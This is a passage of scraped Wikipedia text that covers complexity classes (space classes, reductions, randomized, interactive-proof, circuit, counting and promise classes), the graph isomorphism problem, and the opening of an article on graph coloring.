thatL⊆NL⊆P{\displaystyle {\mathsf {L}}\subseteq {\mathsf {NL}}\subseteq {\mathsf {P}}}. However, it is not known whether any of these relationships is proper. The complexity classesPSPACEandNPSPACEare the space analogues toPandNP. That is,PSPACEis the class of problems solvable in polynomial space by a deterministic Turing machine andNPSPACEis the class of problems solvable in polynomial space by a nondeterministic Turing machine. More formally, While it is not known whetherP=NP,Savitch's theoremfamously showed thatPSPACE=NPSPACE. It is also known thatP⊆PSPACE{\displaystyle {\mathsf {P}}\subseteq {\mathsf {PSPACE}}}, which follows intuitively from the fact that, since writing to a cell on a Turing machine's tape is defined as taking one unit of time, a Turing machine operating in polynomial time can only write to polynomially many cells. It is suspected thatPis strictly smaller thanPSPACE, but this has not been proven. The complexity classesEXPSPACEandNEXPSPACEare the space analogues toEXPTIMEandNEXPTIME. That is,EXPSPACEis the class of problems solvable in exponential space by a deterministic Turing machine andNEXPSPACEis the class of problems solvable in exponential space by a nondeterministic Turing machine. Or more formally, Savitch's theoremshowed thatEXPSPACE=NEXPSPACE. This class is extremely broad: it is known to be a strict superset ofPSPACE,NP, andP, and is believed to be a strict superset ofEXPTIME. Complexity classes have a variety ofclosureproperties. For example, decision classes may be closed undernegation,disjunction,conjunction, or even under allBoolean operations. Moreover, they might also be closed under a variety of quantification schemes.P, for instance, is closed under all Boolean operations, and under quantification over polynomially sized domains. Closure properties can be helpful in separating classes—one possible route to separating two complexity classes is to find some closure property possessed by one class but not by the other. Each classXthat is not closed under negation has a complement classco-X, which consists of the complements of the languages contained inX(i.e.co-X={L|L¯∈X}{\displaystyle {\textsf {co-X}}=\{L|{\overline {L}}\in {\mathsf {X}}\}}).co-NP, for instance, is one important complement complexity class, and sits at the center of the unsolved problem over whetherco-NP=NP. Closure properties are one of the key reasons many complexity classes are defined in the way that they are.[11]Take, for example, a problem that can be solved inO(n){\displaystyle O(n)}time (that is, in linear time) and one that can be solved in, at best,O(n1000){\displaystyle O(n^{1000})}time. Both of these problems are inP, yet the runtime of the second grows considerably faster than the runtime of the first as the input size increases. One might ask whether it would be better to define the class of "efficiently solvable" problems using some smaller polynomial bound, likeO(n3){\displaystyle O(n^{3})}, rather than all polynomials, which allows for such large discrepancies. It turns out, however, that the set of all polynomials is the smallest class of functions containing the linear functions that is also closed under addition, multiplication, and composition (for instance,O(n3)∘O(n2)=O(n6){\displaystyle O(n^{3})\circ O(n^{2})=O(n^{6})}, which is a polynomial butO(n6)>O(n3){\displaystyle O(n^{6})>O(n^{3})}).[11]Since we would like composing one efficient algorithm with another efficient algorithm to still be considered efficient, the polynomials are the smallest class that ensures composition of "efficient algorithms".[12](Note that the definition ofPis also useful because, empirically, almost all problems inPthat are practically useful do in fact have low order polynomial runtimes, and almost all problems outside ofPthat are practically useful do not have any known algorithms with small exponential runtimes, i.e. withO(cn){\displaystyle O(c^{n})}runtimes wherecis close to 1.[13]) Many complexity classes are defined using the concept of areduction. A reduction is a transformation of one problem into another problem, i.e. a reduction takes inputs from one problem and transforms them into inputs of another problem. For instance, you can reduce ordinary base-10 additionx+y{\displaystyle x+y}to base-2 addition by transformingx{\displaystyle x}andy{\displaystyle y}to their base-2 notation (e.g. 5+7 becomes 101+111). Formally, a problemX{\displaystyle X}reduces to a problemY{\displaystyle Y}if there exists a functionf{\displaystyle f}such that for everyx∈Σ∗{\displaystyle x\in \Sigma ^{*}},x∈X{\displaystyle x\in X}if and only iff(x)∈Y{\displaystyle f(x)\in Y}. Generally, reductions are used to capture the notion of a problem being at least as difficult as another problem. Thus we are generally interested in using a polynomial-time reduction, since any problemX{\displaystyle X}that can be efficiently reduced to another problemY{\displaystyle Y}is no more difficult thanY{\displaystyle Y}. Formally, a problemX{\displaystyle X}is polynomial-time reducible to a problemY{\displaystyle Y}if there exists apolynomial-timecomputable functionp{\displaystyle p}such that for allx∈Σ∗{\displaystyle x\in \Sigma ^{*}},x∈X{\displaystyle x\in X}if and only ifp(x)∈Y{\displaystyle p(x)\in Y}. Note that reductions can be defined in many different ways. Common reductions areCook reductions,Karp reductionsandLevin reductions, and can vary based on resource bounds, such aspolynomial-time reductionsandlog-space reductions. Reductions motivate the concept of a problem beinghardfor a complexity class. A problemX{\displaystyle X}is hard for a class of problemsCif every problem inCcan be polynomial-time reduced toX{\displaystyle X}. Thus no problem inCis harder thanX{\displaystyle X}, since an algorithm forX{\displaystyle X}allows us to solve any problem inCwith at most polynomial slowdown. Of particular importance, the set of problems that are hard forNPis called the set ofNP-hardproblems. If a problemX{\displaystyle X}is hard forCand is also inC, thenX{\displaystyle X}is said to becompleteforC. This means thatX{\displaystyle X}is the hardest problem inC(since there could be many problems that are equally hard, more preciselyX{\displaystyle X}is as hard as the hardest problems inC). Of particular importance is the class ofNP-completeproblems—the most difficult problems inNP. Because all problems inNPcan be polynomial-time reduced toNP-complete problems, finding anNP-complete problem that can be solved in polynomial time would mean thatP=NP. Savitch's theorem establishes the relationship between deterministic and nondetermistic space resources. It shows that if a nondeterministic Turing machine can solve a problem usingf(n){\displaystyle f(n)}space, then a deterministic Turing machine can solve the same problem inf(n)2{\displaystyle f(n)^{2}}space, i.e. in the square of the space. Formally, Savitch's theorem states that for anyf(n)>n{\displaystyle f(n)>n},[14] Important corollaries of Savitch's theorem are thatPSPACE=NPSPACE(since the square of a polynomial is still a polynomial) andEXPSPACE=NEXPSPACE(since the square of an exponential is still an exponential). These relationships answer fundamental questions about the power of nondeterminism compared to determinism. Specifically, Savitch's theorem shows that any problem that a nondeterministic Turing machine can solve in polynomial space, a deterministic Turing machine can also solve in polynomial space. Similarly, any problem that a nondeterministic Turing machine can solve in exponential space, a deterministic Turing machine can also solve in exponential space. By definition ofDTIME, it follows thatDTIME(nk1){\displaystyle {\mathsf {DTIME}}(n^{k_{1}})}is contained inDTIME(nk2){\displaystyle {\mathsf {DTIME}}(n^{k_{2}})}ifk1≤k2{\displaystyle k_{1}\leq k_{2}}, sinceO(nk1)⊆O(nk2){\displaystyle O(n^{k_{1}})\subseteq O(n^{k_{2}})}ifk1≤k2{\displaystyle k_{1}\leq k_{2}}. However, this definition gives no indication of whether this inclusion is strict. For time and space requirements, the conditions under which the inclusion is strict are given by the time and space hierarchy theorems, respectively. They are called hierarchy theorems because they induce a proper hierarchy on the classes defined by constraining the respective resources. The hierarchy theorems enable one to make quantitative statements about how much more additional time or space is needed in order to increase the number of problems that can be solved. Thetime hierarchy theoremstates that Thespace hierarchy theoremstates that The time and space hierarchy theorems form the basis for most separation results of complexity classes. For instance, the time hierarchy theorem establishes thatPis strictly contained inEXPTIME, and the space hierarchy theorem establishes thatLis strictly contained inPSPACE. While deterministic and non-deterministicTuring machinesare the most commonly used models of computation, many complexity classes are defined in terms of other computational models. In particular, These are explained in greater detail below. A number of important complexity classes are defined using theprobabilistic Turing machine, a variant of theTuring machinethat can toss random coins. These classes help to better describe the complexity ofrandomized algorithms. A probabilistic Turing machine is similar to a deterministic Turing machine, except rather than following a single transition function (a set of rules for how to proceed at each step of the computation) it probabilistically selects between multiple transition functions at each step. The standard definition of a probabilistic Turing machine specifies two transition functions, so that the selection of transition function at each step resembles a coin flip. The randomness introduced at each step of the computation introduces the potential for error; that is, strings that the Turing machine is meant to accept may on some occasions be rejected and strings that the Turing machine is meant to reject may on some occasions be accepted. As a result, the complexity classes based on the probabilistic Turing machine are defined in large part around the amount of error that is allowed. Formally, they are defined using an error probabilityϵ{\displaystyle \epsilon }. A probabilistic Turing machineM{\displaystyle M}is said to recognize a languageL{\displaystyle L}with error probabilityϵ{\displaystyle \epsilon }if: The fundamental randomized time complexity classes areZPP,RP,co-RP,BPP, andPP. The strictest class isZPP(zero-error probabilistic polynomial time), the class of problems solvable in polynomial time by a probabilistic Turing machine with error probability 0. Intuitively, this is the strictest class of probabilistic problems because it demandsno error whatsoever. A slightly looser class isRP(randomized polynomial time), which maintains no error for strings not in the language but allows bounded error for strings in the language. More formally, a language is inRPif there is a probabilistic polynomial-time Turing machineM{\displaystyle M}such that if a string is not in the language thenM{\displaystyle M}always rejects and if a string is in the language thenM{\displaystyle M}accepts with a probability at least 1/2. The classco-RPis similarly defined except the roles are flipped: error is not allowed for strings in the language but is allowed for strings not in the language. Taken together, the classesRPandco-RPencompass all of the problems that can be solved by probabilistic Turing machines withone-sided error. Loosening the error requirements further to allow fortwo-sided erroryields the classBPP(bounded-error probabilistic polynomial time), the class of problems solvable in polynomial time by a probabilistic Turing machine with error probability less than 1/3 (for both strings in the language and not in the language).BPPis the most practically relevant of the probabilistic complexity classes—problems inBPPhave efficientrandomized algorithmsthat can be run quickly on real computers.BPPis also at the center of the important unsolved problem in computer science over whetherP=BPP, which if true would mean that randomness does not increase the computational power of computers, i.e. any probabilistic Turing machine could be simulated by a deterministic Turing machine with at most polynomial slowdown. The broadest class of efficiently-solvable probabilistic problems isPP(probabilistic polynomial time), the set of languages solvable by a probabilistic Turing machine in polynomial time with an error probability of less than 1/2 for all strings. ZPP,RPandco-RPare all subsets ofBPP, which in turn is a subset ofPP. The reason for this is intuitive: the classes allowing zero error and only one-sided error are all contained within the class that allows two-sided error, andPPsimply relaxes the error probability ofBPP.ZPPrelates toRPandco-RPin the following way:ZPP=RP∩co-RP{\displaystyle {\textsf {ZPP}}={\textsf {RP}}\cap {\textsf {co-RP}}}. That is,ZPPconsists exactly of those problems that are in bothRPandco-RP. Intuitively, this follows from the fact thatRPandco-RPallow only one-sided error:co-RPdoes not allow error for strings in the language andRPdoes not allow error for strings not in the language. Hence, if a problem is in bothRPandco-RP, then there must be no error for strings both inandnot in the language (i.e. no error whatsoever), which is exactly the definition ofZPP. Important randomized space complexity classes includeBPL,RL, andRLP. A number of complexity classes are defined usinginteractive proof systems. Interactive proofs generalize the proofs definition of the complexity classNPand yield insights intocryptography,approximation algorithms, andformal verification. Interactive proof systems areabstract machinesthat model computation as the exchange of messages between two parties: a proverP{\displaystyle P}and a verifierV{\displaystyle V}. The parties interact by exchanging messages, and an input string is accepted by the system if the verifier decides to accept the input on the basis of the messages it has received from the prover. The proverP{\displaystyle P}has unlimited computational power while the verifier has bounded computational power (the standard definition of interactive proof systems defines the verifier to be polynomially-time bounded). The prover, however, is untrustworthy (this prevents all languages from being trivially recognized by the proof system by having the computationally unbounded prover solve for whether a string is in a language and then sending a trustworthy "YES" or "NO" to the verifier), so the verifier must conduct an "interrogation" of the prover by "asking it" successive rounds of questions, accepting only if it develops a high degree of confidence that the string is in the language.[15] The classNPis a simple proof system in which the verifier is restricted to being a deterministic polynomial-timeTuring machineand the procedure is restricted to one round (that is, the prover sends only a single, full proof—typically referred to as thecertificate—to the verifier). Put another way, in the definition of the classNP(the set of decision problems for which the problem instances, when the answer is "YES", have proofs verifiable in polynomial time by a deterministic Turing machine) is a proof system in which the proof is constructed by an unmentioned prover and the deterministic Turing machine is the verifier. For this reason,NPcan also be calleddIP(deterministic interactive proof), though it is rarely referred to as such. It turns out thatNPcaptures the full power of interactive proof systems with deterministic (polynomial-time) verifiers because it can be shown that for any proof system with a deterministic verifier it is never necessary to need more than a single round of messaging between the prover and the verifier. Interactive proof systems that provide greater computational power over standard complexity classes thus requireprobabilisticverifiers, which means that the verifier's questions to the prover are computed usingprobabilistic algorithms. As noted in the section above onrandomized computation, probabilistic algorithms introduce error into the system, so complexity classes based on probabilistic proof systems are defined in terms of an error probabilityϵ{\displaystyle \epsilon }. The most general complexity class arising out of this characterization is the classIP(interactive polynomial time), which is the class of all problems solvable by an interactive proof system(P,V){\displaystyle (P,V)}, whereV{\displaystyle V}is probabilistic polynomial-time and the proof system satisfies two properties: for a languageL∈IP{\displaystyle L\in {\mathsf {IP}}} An important feature ofIPis that it equalsPSPACE. In other words, any problem that can be solved by a polynomial-time interactive proof system can also be solved by adeterministic Turing machinewith polynomial space resources, and vice versa. A modification of the protocol forIPproduces another important complexity class:AM(Arthur–Merlin protocol). In the definition of interactive proof systems used byIP, the prover was not able to see the coins utilized by the verifier in its probabilistic computation—it was only able to see the messages that the verifier produced with these coins. For this reason, the coins are calledprivate random coins. The interactive proof system can be constrained so that the coins used by the verifier arepublic random coins; that is, the prover is able to see the coins. Formally,AMis defined as the class of languages with an interactive proof in which the verifier sends a random string to the prover, the prover responds with a message, and the verifier either accepts or rejects by applying a deterministic polynomial-time function to the message from the prover.AMcan be generalized toAM[k], wherekis the number of messages exchanged (so in the generalized form the standardAMdefined above isAM[2]). However, it is the case that for allk≥2{\displaystyle k\geq 2},AM[k]=AM[2]. It is also the case thatAM[k]⊆IP[k]{\displaystyle {\mathsf {AM}}[k]\subseteq {\mathsf {IP}}[k]}. Other complexity classes defined using interactive proof systems includeMIP(multiprover interactive polynomial time) andQIP(quantum interactive polynomial time). An alternative model of computation to theTuring machineis theBoolean circuit, a simplified model of thedigital circuitsused in moderncomputers. Not only does this model provide an intuitive connection between computation in theory and computation in practice, but it is also a natural model fornon-uniform computation(computation in which different input sizes within the same problem use different algorithms). Formally, a Boolean circuitC{\displaystyle C}is adirected acyclic graphin which edges represent wires (which carry thebitvalues 0 and 1), the input bits are represented by source vertices (vertices with no incoming edges), and all non-source vertices representlogic gates(generally theAND,OR, andNOT gates). One logic gate is designated the output gate, and represents the end of the computation. The input/output behavior of a circuitC{\displaystyle C}withn{\displaystyle n}input variables is represented by theBoolean functionfC:{0,1}n→{0,1}{\displaystyle f_{C}:\{0,1\}^{n}\to \{0,1\}}; for example, on input bitsx1,x2,...,xn{\displaystyle x_{1},x_{2},...,x_{n}}, the output bitb{\displaystyle b}of the circuit is represented mathematically asb=fC(x1,x2,...,xn){\displaystyle b=f_{C}(x_{1},x_{2},...,x_{n})}. The circuitC{\displaystyle C}is said tocomputethe Boolean functionfC{\displaystyle f_{C}}. Any particular circuit has a fixed number of input vertices, so it can only act on inputs of that size.Languages(the formal representations ofdecision problems), however, contain strings of differing lengths, so languages cannot be fully captured by a single circuit (this contrasts with the Turing machine model, in which a language is fully described by a single Turing machine that can act on any input size). A language is thus represented by acircuit family. A circuit family is an infinite list of circuits(C0,C1,C2,...){\displaystyle (C_{0},C_{1},C_{2},...)}, whereCn{\displaystyle C_{n}}is a circuit withn{\displaystyle n}input variables. A circuit family is said to decide a languageL{\displaystyle L}if, for every stringw{\displaystyle w},w{\displaystyle w}is in the languageL{\displaystyle L}if and only ifCn(w)=1{\displaystyle C_{n}(w)=1}, wheren{\displaystyle n}is the length ofw{\displaystyle w}. In other words, a stringw{\displaystyle w}of sizen{\displaystyle n}is in the language represented by the circuit family(C0,C1,C2,...){\displaystyle (C_{0},C_{1},C_{2},...)}if the circuitCn{\displaystyle C_{n}}(the circuit with the same number of input vertices as the number of bits inw{\displaystyle w}) evaluates to 1 whenw{\displaystyle w}is its input. While complexity classes defined using Turing machines are described in terms oftime complexity, circuit complexity classes are defined in terms of circuit size — the number of vertices in the circuit. The size complexity of a circuit family(C0,C1,C2,...){\displaystyle (C_{0},C_{1},C_{2},...)}is the functionf:N→N{\displaystyle f:\mathbb {N} \to \mathbb {N} }, wheref(n){\displaystyle f(n)}is the circuit size ofCn{\displaystyle C_{n}}. The familiar function classes follow naturally from this; for example, a polynomial-size circuit family is one such that the functionf{\displaystyle f}is apolynomial. The complexity classP/polyis the set of languages that are decidable by polynomial-size circuit families. It turns out that there is a natural connection between circuit complexity and time complexity. Intuitively, a language with small time complexity (that is, requires relatively few sequential operations on a Turing machine), also has a small circuit complexity (that is, requires relatively few Boolean operations). Formally, it can be shown that if a language is inDTIME(t(n)){\displaystyle {\mathsf {DTIME}}(t(n))}, wheret{\displaystyle t}is a functiont:N→N{\displaystyle t:\mathbb {N} \to \mathbb {N} }, then it has circuit complexityO(t2(n)){\displaystyle O(t^{2}(n))}.[16]It follows directly from this fact thatP⊂P/poly{\displaystyle {\mathsf {\color {Blue}P}}\subset {\textsf {P/poly}}}. In other words, any problem that can be solved in polynomial time by a deterministic Turing machine can also be solved by a polynomial-size circuit family. It is further the case that the inclusion is proper, i.e.P⊊P/poly{\displaystyle {\textsf {P}}\subsetneq {\textsf {P/poly}}}(for example, there are someundecidable problemsthat are inP/poly). P/polyhas a number of properties that make it highly useful in the study of the relationships between complexity classes. In particular, it is helpful in investigating problems related toPversusNP. For example, if there is any language inNPthat is not inP/poly, thenP≠NP{\displaystyle {\mathsf {P}}\neq {\mathsf {NP}}}.[17]P/polyis also helpful in investigating properties of thepolynomial hierarchy. For example, ifNP⊆P/poly, thenPHcollapses toΣ2P{\displaystyle \Sigma _{2}^{\mathsf {P}}}. A full description of the relations betweenP/polyand other complexity classes is available at "Importance of P/poly".P/polyis also helpful in the general study of the properties ofTuring machines, as the class can be equivalently defined as the class of languages recognized by a polynomial-time Turing machine with a polynomial-boundedadvice function. Two subclasses ofP/polythat have interesting properties in their own right areNCandAC. These classes are defined not only in terms of their circuit size but also in terms of theirdepth. The depth of a circuit is the length of the longestdirected pathfrom an input node to the output node. The classNCis the set of languages that can be solved by circuit families that are restricted not only to having polynomial-size but also to having polylogarithmic depth. The classACis defined similarly toNC, however gates are allowed to have unbounded fan-in (that is, the AND and OR gates can be applied to more than two bits).NCis a notable class because it can be equivalently defined as the class of languages that have efficientparallel algorithms. The classesBQPandQMA, which are of key importance inquantum information science, are defined usingquantum Turing machines. While most complexity classes studied by computer scientists are sets ofdecision problems, there are also a number of complexity classes defined in terms of other types of problems. In particular, there are complexity classes consisting ofcounting problems,function problems, andpromise problems. These are explained in greater detail below. Acounting problemasks not onlywhethera solution exists (as with adecision problem), but askshow manysolutions exist.[18]For example, the decision problemCYCLE{\displaystyle {\texttt {CYCLE}}}askswhethera particular graphG{\displaystyle G}has asimple cycle(the answer is a simple yes/no); the corresponding counting problem#CYCLE{\displaystyle \#{\texttt {CYCLE}}}(pronounced "sharp cycle") askshow manysimple cyclesG{\displaystyle G}has.[19]The output to a counting problem is thus a number, in contrast to the output for a decision problem, which is a simple yes/no (or accept/reject, 0/1, or other equivalent scheme).[20] Thus, whereas decision problems are represented mathematically asformal languages, counting problems are represented mathematically asfunctions: a counting problem is formalized as the functionf:{0,1}∗→N{\displaystyle f:\{0,1\}^{*}\to \mathbb {N} }such that for every inputw∈{0,1}∗{\displaystyle w\in \{0,1\}^{*}},f(w){\displaystyle f(w)}is the number of solutions. For example, in the#CYCLE{\displaystyle \#{\texttt {CYCLE}}}problem, the input is a graphG∈{0,1}∗{\displaystyle G\in \{0,1\}^{*}}(a graph represented as a string ofbits) andf(G){\displaystyle f(G)}is the number of simple cycles inG{\displaystyle G}. Counting problems arise in a number of fields, includingstatistical estimation,statistical physics,network design, andeconomics.[21] #P(pronounced "sharp P") is an important class of counting problems that can be thought of as the counting version ofNP.[22]The connection toNParises from the fact that the number of solutions to a problem equals the number of accepting branches in anondeterministic Turing machine's computation tree.#Pis thus formally defined as follows: And just asNPcan be defined both in terms of nondeterminism and in terms of a verifier (i.e. as aninteractive proof system), so too can#Pbe equivalently defined in terms of a verifier. Recall that a decision problem is inNPif there exists a polynomial-time checkablecertificateto a given problem instance—that is,NPasks whether there exists a proof of membership (a certificate) for the input that can be checked for correctness in polynomial time. The class#Paskshow manysuch certificates exist.[22]In this context,#Pis defined as follows: Counting problems are a subset of a broader class of problems calledfunction problems. A function problem is a type of problem in which the values of afunctionf:A→B{\displaystyle f:A\to B}are computed. Formally, a function problemf{\displaystyle f}is defined as a relationR{\displaystyle R}over strings of an arbitraryalphabetΣ{\displaystyle \Sigma }: An algorithm solvesf{\displaystyle f}if for every inputx{\displaystyle x}such that there exists ay{\displaystyle y}satisfying(x,y)∈R{\displaystyle (x,y)\in R}, the algorithm produces one suchy{\displaystyle y}. This is just another way of saying thatf{\displaystyle f}is afunctionand the algorithm solvesf(x){\displaystyle f(x)}for allx∈Σ∗{\displaystyle x\in \Sigma ^{*}}. An important function complexity class isFP, the class of efficiently solvable functions.[23]More specifically,FPis the set of function problems that can be solved by adeterministic Turing machineinpolynomial time.[23]FPcan be thought of as the function problem equivalent ofP. Importantly,FPprovides some insight into both counting problems andPversusNP. If#P=FP, then the functions that determine the number of certificates for problems inNPare efficiently solvable. And since computing the number of certificates is at least as hard as determining whether a certificate exists, it must follow that if#P=FPthenP=NP(it is not known whether this holds in the reverse, i.e. whetherP=NPimplies#P=FP).[23] Just asFPis the function problem equivalent ofP,FNPis the function problem equivalent ofNP. Importantly,FP=FNPif and only ifP=NP.[24] Promise problemsare a generalization of decision problems in which the input to a problem is guaranteed ("promised") to be from a particular subset of all possible inputs. Recall that with a decision problemL⊆{0,1}∗{\displaystyle L\subseteq \{0,1\}^{*}}, an algorithmM{\displaystyle M}forL{\displaystyle L}must act (correctly) oneveryw∈{0,1}∗{\displaystyle w\in \{0,1\}^{*}}. A promise problem loosens the input requirement onM{\displaystyle M}by restricting the input to some subset of{0,1}∗{\displaystyle \{0,1\}^{*}}. Specifically, a promise problem is defined as a pair of non-intersecting sets(ΠACCEPT,ΠREJECT){\displaystyle (\Pi _{\text{ACCEPT}},\Pi _{\text{REJECT}})}, where:[25] The input to an algorithmM{\displaystyle M}for a promise problem(ΠACCEPT,ΠREJECT){\displaystyle (\Pi _{\text{ACCEPT}},\Pi _{\text{REJECT}})}is thusΠACCEPT∪ΠREJECT{\displaystyle \Pi _{\text{ACCEPT}}\cup \Pi _{\text{REJECT}}}, which is called thepromise. Strings inΠACCEPT∪ΠREJECT{\displaystyle \Pi _{\text{ACCEPT}}\cup \Pi _{\text{REJECT}}}are said tosatisfy the promise.[25]By definition,ΠACCEPT{\displaystyle \Pi _{\text{ACCEPT}}}andΠREJECT{\displaystyle \Pi _{\text{REJECT}}}must be disjoint, i.e.ΠACCEPT∩ΠREJECT=∅{\displaystyle \Pi _{\text{ACCEPT}}\cap \Pi _{\text{REJECT}}=\emptyset }. Within this formulation, it can be seen that decision problems are just the subset of promise problems with the trivial promiseΠACCEPT∪ΠREJECT={0,1}∗{\displaystyle \Pi _{\text{ACCEPT}}\cup \Pi _{\text{REJECT}}=\{0,1\}^{*}}. With decision problems it is thus simpler to simply define the problem as onlyΠACCEPT{\displaystyle \Pi _{\text{ACCEPT}}}(withΠREJECT{\displaystyle \Pi _{\text{REJECT}}}implicitly being{0,1}∗/ΠACCEPT{\displaystyle \{0,1\}^{*}/\Pi _{\text{ACCEPT}}}), which throughout this page is denotedL{\displaystyle L}to emphasize thatΠACCEPT=L{\displaystyle \Pi _{\text{ACCEPT}}=L}is aformal language. Promise problems make for a more natural formulation of many computational problems. For instance, a computational problem could be something like "given aplanar graph, determine whether or not..."[26]This is often stated as a decision problem, where it is assumed that there is some translation schema that takeseverystrings∈{0,1}∗{\displaystyle s\in \{0,1\}^{*}}to a planar graph. However, it is more straightforward to define this as a promise problem in which the input is promised to be a planar graph. Promise problems provide an alternate definition for standard complexity classes of decision problems.P, for instance, can be defined as a promise problem:[27] Classes of decision problems—that is, classes of problems defined as formal languages—thus translate naturally to promise problems, where a languageL{\displaystyle L}in the class is simplyL=ΠACCEPT{\displaystyle L=\Pi _{\text{ACCEPT}}}andΠREJECT{\displaystyle \Pi _{\text{REJECT}}}is implicitly{0,1}∗/ΠACCEPT{\displaystyle \{0,1\}^{*}/\Pi _{\text{ACCEPT}}}. Formulating many basic complexity classes likePas promise problems provides little additional insight into their nature. However, there are some complexity classes for which formulating them as promise problems have been useful to computer scientists. Promise problems have, for instance, played a key role in the study ofSZK(statistical zero-knowledge).[28] The following table shows some of the classes of problems that are considered in complexity theory. If classXis a strictsubsetofY, thenXis shown belowYwith a dark line connecting them. IfXis a subset, but it is unknown whether they are equal sets, then the line is lighter and dotted. Technically, the breakdown into decidable and undecidable pertains more to the study ofcomputability theory, but is useful for putting the complexity classes in perspective.
https://en.wikipedia.org/wiki/Complexity_class#NP
Ingraph theory, anisomorphism ofgraphsGandHis abijectionbetween the vertex sets ofGandH such that any two verticesuandvofGareadjacentinGif and only iff(u){\displaystyle f(u)}andf(v){\displaystyle f(v)}are adjacent inH. This kind of bijection is commonly described as "edge-preserving bijection", in accordance with the general notion ofisomorphismbeing a structure-preserving bijection. If anisomorphismexists between two graphs, then the graphs are calledisomorphicand denoted asG≃H{\displaystyle G\simeq H}. In the case when the isomorphism is a mapping of a graph onto itself, i.e., whenGandHare one and the same graph, the isomorphism is called anautomorphismofG. Graph isomorphism is anequivalence relationon graphs and as such it partitions theclassof all graphs intoequivalence classes. A set of graphs isomorphic to each other is called anisomorphism classof graphs. The question of whether graph isomorphism can be determined in polynomial time is a major unsolved problem in computer science, known as thegraph isomorphism problem.[1][2] The two graphs shown below are isomorphic, despite their different lookingdrawings. f(b) = 6 f(c) = 8 f(d) = 3 f(g) = 5 f(h) = 2 f(i) = 4 f(j) = 7 In the above definition, graphs are understood to beundirectednon-labelednon-weightedgraphs. However, the notion of isomorphism may be applied to all other variants of the notion of graph, by adding the requirements to preserve the corresponding additional elements of structure: arc directions, edge weights, etc., with the following exception. Forlabeled graphs, two definitions of isomorphism are in use. Under one definition, an isomorphism is a vertex bijection which is both edge-preserving and label-preserving.[3][4] Under another definition, an isomorphism is an edge-preserving vertex bijection which preserves equivalence classes of labels, i.e., vertices with equivalent (e.g., the same) labels are mapped onto the vertices with equivalent labels and vice versa; same with edge labels.[5] For example, theK2{\displaystyle K_{2}}graph with the two vertices labelled with 1 and 2 has a single automorphism under the first definition, but under the second definition there are two auto-morphisms. The second definition is assumed in certain situations when graphs are endowed withunique labelscommonly taken from the integer range 1,...,n, wherenis the number of the vertices of the graph, used only to uniquely identify the vertices. In such cases two labeled graphs are sometimes said to be isomorphic if the corresponding underlying unlabeled graphs are isomorphic (otherwise the definition of isomorphism would be trivial). The formal notion of "isomorphism", e.g., of "graph isomorphism", captures the informal notion that some objects have "the same structure" if one ignores individual distinctions of "atomic" components of objects in question. Whenever individuality of "atomic" components (vertices and edges, for graphs) is important for correct representation of whatever is modeled by graphs, the model is refined by imposing additional restrictions on the structure, and other mathematical objects are used:digraphs,labeled graphs,colored graphs,rooted treesand so on. The isomorphism relation may also be defined for all these generalizations of graphs: the isomorphism bijection must preserve the elements of structure which define the object type in question:arcs, labels, vertex/edge colors, the root of the rooted tree, etc. The notion of "graph isomorphism" allows us to distinguishgraph propertiesinherent to the structures of graphs themselves from properties associated with graph representations:graph drawings,data structures for graphs,graph labelings, etc. For example, if a graph has exactly onecycle, then all graphs in its isomorphism class also have exactly one cycle. On the other hand, in the common case when the vertices of a graph are (representedby) theintegers1, 2,...N, then the expression may be different for two isomorphic graphs. TheWhitney graph isomorphism theorem,[6]shown byHassler Whitney, states that two connected graphs are isomorphic if and only if theirline graphsare isomorphic, with a single exception:K3, thecomplete graphon three vertices, and thecomplete bipartite graphK1,3, which are not isomorphic but both haveK3as their line graph. The Whitney graph theorem can be extended tohypergraphs.[7] While graph isomorphism may be studied in a classical mathematical way, as exemplified by the Whitney theorem, it is recognized that it is a problem to be tackled with an algorithmic approach. The computational problem of determining whether two finite graphs are isomorphic is called the graph isomorphism problem. Its practical applications include primarilycheminformatics,mathematical chemistry(identification of chemical compounds), andelectronic design automation(verification of equivalence of various representations of the design of anelectronic circuit). The graph isomorphism problem is one of few standard problems incomputational complexity theorybelonging toNP, but not known to belong to either of its well-known (and, ifP ≠ NP, disjoint) subsets:PandNP-complete. It is one of only two, out of 12 total, problems listed inGarey & Johnson (1979)whose complexity remains unresolved, the other beinginteger factorization. It is however known that if the problem is NP-complete then thepolynomial hierarchycollapses to a finite level.[8] In November 2015,László Babai, a mathematician and computer scientist at the University of Chicago, claimed to have proven that the graph isomorphism problem is solvable inquasi-polynomial time.[9][10]He published preliminary versions of these results in the proceedings of the 2016Symposium on Theory of Computing,[11]and of the 2018International Congress of Mathematicians.[12]In January 2017, Babai briefly retracted the quasi-polynomiality claim and stated asub-exponential timecomplexity bound instead. He restored the original claim five days later.[13]As of 2024[update], the full journal version of Babai's paper has not yet been published. Its generalization, thesubgraph isomorphism problem, is known to be NP-complete. The main areas of research for the problem are design of fast algorithms and theoretical investigations of itscomputational complexity, both for the general problem and for special classes of graphs. TheWeisfeiler Leman graph isomorphism testcan be used to heuristically test for graph isomorphism.[14]If the test fails the two input graphs are guaranteed to be non-isomorphic. If the test succeeds the graphs may or may not be isomorphic. There are generalizations of the test algorithm that are guaranteed to detect isomorphisms, however their run time is exponential. Another well-known algorithm for graph isomorphism is the vf2 algorithm, developed by Cordella et al. in 2001.[15]The vf2 algorithm is a depth-first search algorithm that tries to build an isomorphism between two graphs incrementally. It uses a set of feasibility rules to prune the search space, allowing it to efficiently handle graphs with thousands of nodes. The vf2 algorithm has been widely used in various applications, such as pattern recognition, computer vision, and bioinformatics. While it has a worst-case exponential time complexity, it performs well in practice for many types of graphs.
https://en.wikipedia.org/wiki/Graph_isomorphism
Ingraph theory,graph coloringis a methodic assignment of labels traditionally called "colors" to elements of agraph. The assignment is subject to certain constraints, such as that no two adjacent elements have the same color. Graph coloring is a special case ofgraph labeling. In its simplest form, it is a way of coloring theverticesof a graph such that no two adjacent vertices are of the same color; this is called avertex coloring. Similarly, anedge coloringassigns a color to eachedgesso that no two adjacent edges are of the same color, and aface coloringof aplanar graphassigns a color to eachface(or region) so that no two faces that share a boundary have the same color. Vertex coloring is often used to introduce graph coloring problems, since other coloring problems can be transformed into a vertex coloring instance. For example, an edge coloring of a graph is just a vertex coloring of itsline graph, and a face coloring of a plane graph is just a vertex coloring of itsdual. However, non-vertex coloring problems are often stated and studied as-is. This is partlypedagogical, and partly because some problems are best studied in their non-vertex form, as in the case of edge coloring. The convention of using colors originates from coloring the countries in apolitical map, where each face is literally colored. This was generalized to coloring the faces of a graphembeddedin the plane. By planar duality it became coloring the vertices, and in this form it generalizes to all graphs. In mathematical and computer representations, it is typical to use the first few positive or non-negative integers as the "colors". In general, one can use anyfinite setas the "color set". The nature of the coloring problem depends on the number of 